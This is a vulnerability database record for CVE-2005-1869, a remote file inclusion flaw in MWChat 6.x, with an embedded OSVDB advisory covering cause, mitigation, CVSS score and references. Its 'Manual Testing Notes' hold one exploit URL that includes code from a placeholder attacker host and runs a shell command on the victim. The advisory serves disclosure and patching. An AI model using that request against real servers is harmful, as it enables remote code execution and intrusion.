ID CVE-2005-1869 Type cve Reporter cve@mitre.org Modified 2008-09-05T20:50:00
Description
PHP remote file inclusion vulnerability in start_lobby.php in MWChat 6.x allows remote attackers to execute arbitrary PHP code via the CONFIG[MWCHAT_Libs] parameter.
{"osvdb": [{"lastseen": "2017-04-28T13:20:13", "bulletinFamily": "software", "cvelist": ["CVE-2005-1869"], "edition": 1, "description": "## Vulnerability Description\nMWChat contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to start_lobby.php not properly sanitizing user input supplied to the CONFIG[MWCHAT_Libs] variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nIt has been reported that the vendor's distribution file ships with .htaccess files which protect several directories. This flaw is only exploitable if the .htaccess file has been removed.\n## Solution Description\nUpgrade to version 6.8 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nMWChat contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to start_lobby.php not properly sanitizing user input supplied to the CONFIG[MWCHAT_Libs] variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[victim]/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://[attacker]/cmd.txt?&cmd=uname -a\n## References:\nVendor URL: http://www.appindex.net/products/detail/?product=mwchat\nVendor URL: http://www.appindex.net\nSecurity Tracker: 1014090\n[Secunia Advisory ID:15596](https://secuniaresearch.flexerasoftware.com/advisories/15596/)\nOther Advisory URL: http://www.defacers.com.mx/advisories/4.txt\nISS X-Force ID: 20865\n[CVE-2005-1869](https://vulners.com/cve/CVE-2005-1869)\n", "modified": "2005-06-01T08:12:26", "published": "2005-06-01T08:12:26", "href": "https://vulners.com/osvdb/OSVDB:17087", "id": "OSVDB:17087", "title": "MWChat start_lobby.php Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}